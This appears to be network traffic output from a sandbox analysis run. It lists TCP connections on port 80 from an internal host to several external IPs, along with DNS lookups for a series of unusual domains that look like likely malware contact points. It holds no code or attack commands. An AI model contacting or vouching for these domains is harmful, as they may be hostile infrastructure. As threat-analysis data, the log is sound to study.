                                              Sep 26, 2024 15:23:27.825455904 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.825692892 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.825748920 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.829912901 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.829982996 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.829993010 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.830030918 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.830154896 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.830199957 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.913589001 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.913615942 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.913625956 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.913674116 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.913786888 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.913796902 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.913806915 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.913813114 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.913883924 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.914222002 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.914279938 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.914311886 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.914323092 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.914375067 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.914551020 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.914568901 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.914628983 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.914920092 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.915009022 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.915010929 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.915057898 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.915240049 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.915287018 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:28.736983061 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:29.756525993 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:30.752060890 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:30.848301888 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:30.848557949 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:30.852695942 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:30.853094101 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:30.856440067 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:30.863260984 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.454011917 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.454024076 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.454035997 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.454204082 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.454246998 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.454258919 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.454364061 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.454370975 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.454396963 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.454401970 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.454441071 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.455368042 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.455512047 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.455539942 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.456154108 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.459045887 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.459074020 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.459080935 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.459265947 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.541491032 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.541533947 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.541539907 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.541605949 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.541724920 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.541731119 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.541835070 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.541862965 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.541928053 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.542023897 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.542098999 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.542104959 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.542150021 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.542239904 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.542251110 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.542298079 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.542956114 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.543044090 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.543047905 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.543050051 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.543096066 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.543168068 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.543504953 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.543550968 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:31.543551922 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.543607950 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.546941996 CEST4972780192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:31.551830053 CEST804972767.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:37.091840029 CEST4972880192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:37.096739054 CEST8049728103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:37.101106882 CEST4972880192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:37.112127066 CEST4972880192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:37.116939068 CEST8049728103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:38.628176928 CEST4972880192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:38.679152966 CEST8049728103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:39.646249056 CEST4972980192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:39.651228905 CEST8049729103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:39.651293993 CEST4972980192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:39.664932966 CEST4972980192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:39.669787884 CEST8049729103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:41.173986912 CEST4972980192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:41.219111919 CEST8049729103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:42.192770958 CEST4973080192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:42.197634935 CEST8049730103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:42.197700024 CEST4973080192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:42.211833954 CEST4973080192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:42.216680050 CEST8049730103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:42.216840029 CEST8049730103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:43.720757008 CEST4973080192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:43.767108917 CEST8049730103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:44.739581108 CEST4973180192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:44.744497061 CEST8049731103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:44.745359898 CEST4973180192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:44.758128881 CEST4973180192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:23:44.762927055 CEST8049731103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:58.452466965 CEST8049728103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:23:58.452574015 CEST4972880192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:24:01.034941912 CEST8049729103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:24:01.035137892 CEST4972980192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:24:03.578608036 CEST8049730103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:24:03.578685045 CEST4973080192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:24:06.264643908 CEST8049731103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:24:06.264764071 CEST4973180192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:24:06.265805960 CEST4973180192.168.2.5103.248.137.209
                                              Sep 26, 2024 15:24:06.270570993 CEST8049731103.248.137.209192.168.2.5
                                              Sep 26, 2024 15:24:19.364834070 CEST4973280192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:19.369683981 CEST80497323.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:19.370183945 CEST4973280192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:19.382091999 CEST4973280192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:19.387053967 CEST80497323.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:19.848222017 CEST80497323.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:19.848287106 CEST4973280192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:20.893080950 CEST4973280192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:20.897917032 CEST80497323.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:21.912827015 CEST4973380192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:21.917776108 CEST80497333.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:21.917850018 CEST4973380192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:21.932420015 CEST4973380192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:21.937344074 CEST80497333.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:22.382684946 CEST80497333.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:22.382752895 CEST4973380192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:23.442092896 CEST4973380192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:23.447248936 CEST80497333.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:24.458714008 CEST4973480192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:24.464042902 CEST80497343.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:24.464179039 CEST4973480192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:24.475020885 CEST4973480192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:24.479933977 CEST80497343.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:24.480011940 CEST80497343.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:24.949656010 CEST80497343.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:24.949810028 CEST4973480192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:25.986453056 CEST4973480192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:25.991200924 CEST80497343.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:27.008244991 CEST4973580192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:27.013065100 CEST80497353.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:27.016184092 CEST4973580192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:27.024223089 CEST4973580192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:27.028983116 CEST80497353.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:27.492445946 CEST80497353.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:27.492887974 CEST80497353.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:27.494267941 CEST4973580192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:27.498075962 CEST4973580192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:27.502957106 CEST80497353.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:32.534687996 CEST4973680192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:32.539580107 CEST80497363.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:32.539664984 CEST4973680192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:32.550617933 CEST4973680192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:32.555510998 CEST80497363.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:32.994739056 CEST80497363.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:32.994874954 CEST4973680192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:34.064575911 CEST4973680192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:34.071039915 CEST80497363.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:35.083651066 CEST4973780192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:35.088584900 CEST80497373.33.130.190192.168.2.5
                                              Sep 26, 2024 15:24:35.090176105 CEST4973780192.168.2.53.33.130.190
                                              Sep 26, 2024 15:24:35.102122068 CEST4973780192.168.2.53.33.130.190
Sep 26, 2024 15:24:35.107181072 CEST | 80 | 49737 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:24:35.550893068 CEST | 80 | 49737 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:24:35.552839041 CEST | 49737 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:24:36.611437082 CEST | 49737 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:24:36.616775990 CEST | 80 | 49737 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:24:37.630801916 CEST | 49738 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:24:37.635734081 CEST | 80 | 49738 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:24:37.635821104 CEST | 49738 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:24:37.648211002 CEST | 49738 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:24:37.654695034 CEST | 80 | 49738 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:24:37.654850006 CEST | 80 | 49738 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:24:38.092602968 CEST | 80 | 49738 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:24:38.092660904 CEST | 49738 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:24:39.160135031 CEST | 49738 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:24:39.165190935 CEST | 80 | 49738 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:24:40.180680037 CEST | 49739 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:24:40.185825109 CEST | 80 | 49739 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:24:40.185909033 CEST | 49739 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:24:40.196541071 CEST | 49739 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:24:40.201431990 CEST | 80 | 49739 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:24:40.651166916 CEST | 80 | 49739 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:24:40.651357889 CEST | 80 | 49739 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:24:40.651607990 CEST | 49739 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:24:40.654217005 CEST | 49739 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:24:40.659049988 CEST | 80 | 49739 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:24:45.896491051 CEST | 49740 | 80 | 192.168.2.5 | 85.153.138.113
Sep 26, 2024 15:24:45.901509047 CEST | 80 | 49740 | 85.153.138.113 | 192.168.2.5
Sep 26, 2024 15:24:45.901595116 CEST | 49740 | 80 | 192.168.2.5 | 85.153.138.113
Sep 26, 2024 15:24:45.915941954 CEST | 49740 | 80 | 192.168.2.5 | 85.153.138.113
Sep 26, 2024 15:24:45.921030045 CEST | 80 | 49740 | 85.153.138.113 | 192.168.2.5
Sep 26, 2024 15:24:46.626456976 CEST | 80 | 49740 | 85.153.138.113 | 192.168.2.5
Sep 26, 2024 15:24:46.626894951 CEST | 80 | 49740 | 85.153.138.113 | 192.168.2.5
Sep 26, 2024 15:24:46.626949072 CEST | 80 | 49740 | 85.153.138.113 | 192.168.2.5
Sep 26, 2024 15:24:46.627043009 CEST | 49740 | 80 | 192.168.2.5 | 85.153.138.113
Sep 26, 2024 15:24:47.424271107 CEST | 49740 | 80 | 192.168.2.5 | 85.153.138.113
Sep 26, 2024 15:24:48.443820000 CEST | 49741 | 80 | 192.168.2.5 | 85.153.138.113
Sep 26, 2024 15:24:48.453391075 CEST | 80 | 49741 | 85.153.138.113 | 192.168.2.5
Sep 26, 2024 15:24:48.453488111 CEST | 49741 | 80 | 192.168.2.5 | 85.153.138.113
Sep 26, 2024 15:24:48.466774940 CEST | 49741 | 80 | 192.168.2.5 | 85.153.138.113
Sep 26, 2024 15:24:48.478318930 CEST | 80 | 49741 | 85.153.138.113 | 192.168.2.5
Sep 26, 2024 15:24:49.257050991 CEST | 80 | 49741 | 85.153.138.113 | 192.168.2.5
Sep 26, 2024 15:24:49.258821964 CEST | 80 | 49741 | 85.153.138.113 | 192.168.2.5
Sep 26, 2024 15:24:49.258840084 CEST | 80 | 49741 | 85.153.138.113 | 192.168.2.5
Sep 26, 2024 15:24:49.258934975 CEST | 49741 | 80 | 192.168.2.5 | 85.153.138.113
Sep 26, 2024 15:24:49.258934975 CEST | 49741 | 80 | 192.168.2.5 | 85.153.138.113
Sep 26, 2024 15:24:49.970933914 CEST | 49741 | 80 | 192.168.2.5 | 85.153.138.113
Sep 26, 2024 15:24:51.026884079 CEST | 49742 | 80 | 192.168.2.5 | 85.153.138.113
Sep 26, 2024 15:24:51.032505035 CEST | 80 | 49742 | 85.153.138.113 | 192.168.2.5
Sep 26, 2024 15:24:51.038302898 CEST | 49742 | 80 | 192.168.2.5 | 85.153.138.113
Sep 26, 2024 15:24:51.057895899 CEST | 49742 | 80 | 192.168.2.5 | 85.153.138.113
Sep 26, 2024 15:24:51.068254948 CEST | 80 | 49742 | 85.153.138.113 | 192.168.2.5
Sep 26, 2024 15:24:51.069972992 CEST | 80 | 49742 | 85.153.138.113 | 192.168.2.5
Sep 26, 2024 15:24:51.979511023 CEST | 80 | 49742 | 85.153.138.113 | 192.168.2.5
Sep 26, 2024 15:24:51.979636908 CEST | 80 | 49742 | 85.153.138.113 | 192.168.2.5
Sep 26, 2024 15:24:51.979650974 CEST | 80 | 49742 | 85.153.138.113 | 192.168.2.5
Sep 26, 2024 15:24:51.979676962 CEST | 49742 | 80 | 192.168.2.5 | 85.153.138.113
Sep 26, 2024 15:24:51.979708910 CEST | 49742 | 80 | 192.168.2.5 | 85.153.138.113
Sep 26, 2024 15:24:52.564632893 CEST | 49742 | 80 | 192.168.2.5 | 85.153.138.113
Sep 26, 2024 15:24:53.882705927 CEST | 49743 | 80 | 192.168.2.5 | 85.153.138.113
Sep 26, 2024 15:24:53.887908936 CEST | 80 | 49743 | 85.153.138.113 | 192.168.2.5
Sep 26, 2024 15:24:53.887994051 CEST | 49743 | 80 | 192.168.2.5 | 85.153.138.113
Sep 26, 2024 15:24:53.900444984 CEST | 49743 | 80 | 192.168.2.5 | 85.153.138.113
Sep 26, 2024 15:24:53.930485964 CEST | 80 | 49743 | 85.153.138.113 | 192.168.2.5
Sep 26, 2024 15:24:54.665582895 CEST | 80 | 49743 | 85.153.138.113 | 192.168.2.5
Sep 26, 2024 15:24:54.666361094 CEST | 80 | 49743 | 85.153.138.113 | 192.168.2.5
Sep 26, 2024 15:24:54.666378021 CEST | 80 | 49743 | 85.153.138.113 | 192.168.2.5
Sep 26, 2024 15:24:54.672158957 CEST | 49743 | 80 | 192.168.2.5 | 85.153.138.113
Sep 26, 2024 15:24:54.678117037 CEST | 49743 | 80 | 192.168.2.5 | 85.153.138.113
Sep 26, 2024 15:24:54.683541059 CEST | 80 | 49743 | 85.153.138.113 | 192.168.2.5
Sep 26, 2024 15:24:59.819639921 CEST | 49744 | 80 | 192.168.2.5 | 172.67.165.25
Sep 26, 2024 15:24:59.824601889 CEST | 80 | 49744 | 172.67.165.25 | 192.168.2.5
Sep 26, 2024 15:24:59.824667931 CEST | 49744 | 80 | 192.168.2.5 | 172.67.165.25
Sep 26, 2024 15:24:59.838757038 CEST | 49744 | 80 | 192.168.2.5 | 172.67.165.25
Sep 26, 2024 15:24:59.843777895 CEST | 80 | 49744 | 172.67.165.25 | 192.168.2.5
Sep 26, 2024 15:25:00.941833973 CEST | 80 | 49744 | 172.67.165.25 | 192.168.2.5
Sep 26, 2024 15:25:00.941847086 CEST | 80 | 49744 | 172.67.165.25 | 192.168.2.5
Sep 26, 2024 15:25:00.941863060 CEST | 80 | 49744 | 172.67.165.25 | 192.168.2.5
Sep 26, 2024 15:25:00.941867113 CEST | 80 | 49744 | 172.67.165.25 | 192.168.2.5
Sep 26, 2024 15:25:00.942004919 CEST | 49744 | 80 | 192.168.2.5 | 172.67.165.25
Sep 26, 2024 15:25:01.346101999 CEST | 49744 | 80 | 192.168.2.5 | 172.67.165.25
Sep 26, 2024 15:25:02.893795967 CEST | 49745 | 80 | 192.168.2.5 | 172.67.165.25
Sep 26, 2024 15:25:02.899184942 CEST | 80 | 49745 | 172.67.165.25 | 192.168.2.5
Sep 26, 2024 15:25:02.899281025 CEST | 49745 | 80 | 192.168.2.5 | 172.67.165.25
Sep 26, 2024 15:25:02.910291910 CEST | 49745 | 80 | 192.168.2.5 | 172.67.165.25
Sep 26, 2024 15:25:02.915215969 CEST | 80 | 49745 | 172.67.165.25 | 192.168.2.5
Sep 26, 2024 15:25:03.908273935 CEST | 80 | 49745 | 172.67.165.25 | 192.168.2.5
Sep 26, 2024 15:25:03.909883976 CEST | 80 | 49745 | 172.67.165.25 | 192.168.2.5
Sep 26, 2024 15:25:03.909946918 CEST | 49745 | 80 | 192.168.2.5 | 172.67.165.25
Sep 26, 2024 15:25:04.424560070 CEST | 49745 | 80 | 192.168.2.5 | 172.67.165.25
Sep 26, 2024 15:25:05.992919922 CEST | 49746 | 80 | 192.168.2.5 | 172.67.165.25
Sep 26, 2024 15:25:05.998013973 CEST | 80 | 49746 | 172.67.165.25 | 192.168.2.5
Sep 26, 2024 15:25:05.998135090 CEST | 49746 | 80 | 192.168.2.5 | 172.67.165.25
Sep 26, 2024 15:25:06.011473894 CEST | 49746 | 80 | 192.168.2.5 | 172.67.165.25
Sep 26, 2024 15:25:06.016449928 CEST | 80 | 49746 | 172.67.165.25 | 192.168.2.5
Sep 26, 2024 15:25:06.016462088 CEST | 80 | 49746 | 172.67.165.25 | 192.168.2.5
Sep 26, 2024 15:25:07.010147095 CEST | 80 | 49746 | 172.67.165.25 | 192.168.2.5
Sep 26, 2024 15:25:07.011473894 CEST | 80 | 49746 | 172.67.165.25 | 192.168.2.5
Sep 26, 2024 15:25:07.014255047 CEST | 49746 | 80 | 192.168.2.5 | 172.67.165.25
Sep 26, 2024 15:25:07.517755032 CEST | 49746 | 80 | 192.168.2.5 | 172.67.165.25
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 26, 2024 15:22:24.954106092 CEST | 59394 | 53 | 192.168.2.5 | 1.1.1.1
Sep 26, 2024 15:22:25.016787052 CEST | 53 | 59394 | 1.1.1.1 | 192.168.2.5
Sep 26, 2024 15:22:40.724934101 CEST | 60622 | 53 | 192.168.2.5 | 1.1.1.1
Sep 26, 2024 15:22:40.759285927 CEST | 53 | 60622 | 1.1.1.1 | 192.168.2.5
Sep 26, 2024 15:22:54.224633932 CEST | 61878 | 53 | 192.168.2.5 | 1.1.1.1
Sep 26, 2024 15:22:54.491645098 CEST | 53 | 61878 | 1.1.1.1 | 192.168.2.5
Sep 26, 2024 15:23:07.699139118 CEST | 59221 | 53 | 192.168.2.5 | 1.1.1.1
Sep 26, 2024 15:23:07.712119102 CEST | 53 | 59221 | 1.1.1.1 | 192.168.2.5
Sep 26, 2024 15:23:21.990358114 CEST | 51473 | 53 | 192.168.2.5 | 1.1.1.1
Sep 26, 2024 15:23:22.109816074 CEST | 53 | 51473 | 1.1.1.1 | 192.168.2.5
Sep 26, 2024 15:23:36.552768946 CEST | 59619 | 53 | 192.168.2.5 | 1.1.1.1
Sep 26, 2024 15:23:37.089288950 CEST | 53 | 59619 | 1.1.1.1 | 192.168.2.5
Sep 26, 2024 15:24:11.272336960 CEST | 57016 | 53 | 192.168.2.5 | 1.1.1.1
Sep 26, 2024 15:24:11.280822992 CEST | 53 | 57016 | 1.1.1.1 | 192.168.2.5
Sep 26, 2024 15:24:19.334300041 CEST | 50893 | 53 | 192.168.2.5 | 1.1.1.1
Sep 26, 2024 15:24:19.360846043 CEST | 53 | 50893 | 1.1.1.1 | 192.168.2.5
Sep 26, 2024 15:24:32.505887032 CEST | 57560 | 53 | 192.168.2.5 | 1.1.1.1
Sep 26, 2024 15:24:32.532193899 CEST | 53 | 57560 | 1.1.1.1 | 192.168.2.5
Sep 26, 2024 15:24:45.664087057 CEST | 52226 | 53 | 192.168.2.5 | 1.1.1.1
Sep 26, 2024 15:24:45.893224955 CEST | 53 | 52226 | 1.1.1.1 | 192.168.2.5
Sep 26, 2024 15:24:59.678277016 CEST | 50436 | 53 | 192.168.2.5 | 1.1.1.1
Sep 26, 2024 15:24:59.815284014 CEST | 53 | 50436 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 26, 2024 15:22:24.954106092 CEST | 192.168.2.5 | 1.1.1.1 | 0x8dbe | Standard query (0) | www.2bhp.com | A (IP address) | IN (0x0001) | false
Sep 26, 2024 15:22:40.724934101 CEST | 192.168.2.5 | 1.1.1.1 | 0xc4c4 | Standard query (0) | www.ultraleap.net | A (IP address) | IN (0x0001) | false
Sep 26, 2024 15:22:54.224633932 CEST | 192.168.2.5 | 1.1.1.1 | 0xb255 | Standard query (0) | www.dalong.site | A (IP address) | IN (0x0001) | false
Sep 26, 2024 15:23:07.699139118 CEST | 192.168.2.5 | 1.1.1.1 | 0xad4 | Standard query (0) | www.mgeducacaopro.online | A (IP address) | IN (0x0001) | false
Sep 26, 2024 15:23:21.990358114 CEST | 192.168.2.5 | 1.1.1.1 | 0xd468 | Standard query (0) | www.heldhold.xyz | A (IP address) | IN (0x0001) | false
Sep 26, 2024 15:23:36.552768946 CEST | 192.168.2.5 | 1.1.1.1 | 0x9b16 | Standard query (0) | www.63582.photo | A (IP address) | IN (0x0001) | false
Sep 26, 2024 15:24:11.272336960 CEST | 192.168.2.5 | 1.1.1.1 | 0xc5c8 | Standard query (0) | www.useanecdotenow.tech | A (IP address) | IN (0x0001) | false
Sep 26, 2024 15:24:19.334300041 CEST | 192.168.2.5 | 1.1.1.1 | 0x3e04 | Standard query (0) | www.asiapartnars.online | A (IP address) | IN (0x0001) | false
Sep 26, 2024 15:24:32.505887032 CEST | 192.168.2.5 | 1.1.1.1 | 0x3eae | Standard query (0) | www.linkwave.cloud | A (IP address) | IN (0x0001) | false
Sep 26, 2024 15:24:45.664087057 CEST | 192.168.2.5 | 1.1.1.1 | 0xc9d0 | Standard query (0) | www.mfgarage.net | A (IP address) | IN (0x0001) | false
Sep 26, 2024 15:24:59.678277016 CEST | 192.168.2.5 | 1.1.1.1 | 0x5748 | Standard query (0) | www.b5x7vk.agency | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
